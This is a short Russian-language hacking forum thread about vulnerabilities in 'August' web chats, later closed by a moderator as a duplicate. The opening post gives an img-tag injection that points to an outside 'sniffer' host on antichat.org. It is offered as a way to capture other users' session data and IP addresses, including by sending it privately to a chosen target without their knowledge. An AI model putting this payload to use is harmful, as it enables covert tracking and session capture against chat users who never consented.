|
Чаты Августа
Народ, давайте в этой тебе постить уязвимости найденные в данном типе чатов (слишком мало информации по ним)
Только без всякого флуда! Нашел уязвимость - отписался. Вопросов в этой теме тоже не надо. Пусть будет как сборник уязвимостей. Внедрение сниффера (толку от этого мало, но все что пока сам нашел ... ) Для того, чтобы внедрить сниффер, нам нужны теги (кто общался с этими чатами, знает, что "html - теги, как привелегия выдаются по достижению определенного колличества часов проведенных в чате, ну или СИ, просите у админа )) Дальше все просто ) Когда вы уже будете иметь данную привелегию, вы соответственно сможете вставлять картинку во фрейм чата вот так: <img src=http://ссылка_на_ваш_рисунок> Элементарно, вместо ссылки на рисуном, вставляем адес сниффера: <img src=http://antichat.org/s/[ваш логин].gif> Как я уже и сказал, толку от этого мало, сниффак ловит только сессию (с ней ничего сделать нельзя к сожалению) и айпи. Единственная хоть и маленькая "полезность" - это то, что вы можете вставить код и отправить его в личку человеку, IP которого вы хотите узнать, без всякого его участия. (в логах будет ваш айпи и жертвы) По тегам буду смотреть дальше, может что и нарою ... но уж очень хорошо там они фильтруются ... |
Была очень опширная тема насчёт августа, просто надо кректно искать, тама описсаны баги в этих чатах, зачем ешё одна тема ?
|
найденные уязвимости сюда выкладывать нету смысла, ибо они в скором времени закрываються.
|
Цитата:
|
Tem, это не тема, здесь рассуждать никому не предлагается, это "сборник"!
Цитата:
syntacsis, без твоего поттверждения здесь никак бы не обошлись? Цитата:
P.S. Смысл раздела "Уязвимости чата" в чем?! это так ... риторика ... |
Цитата:
|
Я тоже думаю прошлая тема про чаты августа была очень обшираня в скором времени я сделаю выборку из того раздела и прикреплю её а эту тему закрываю !
|
| Время: 08:55 |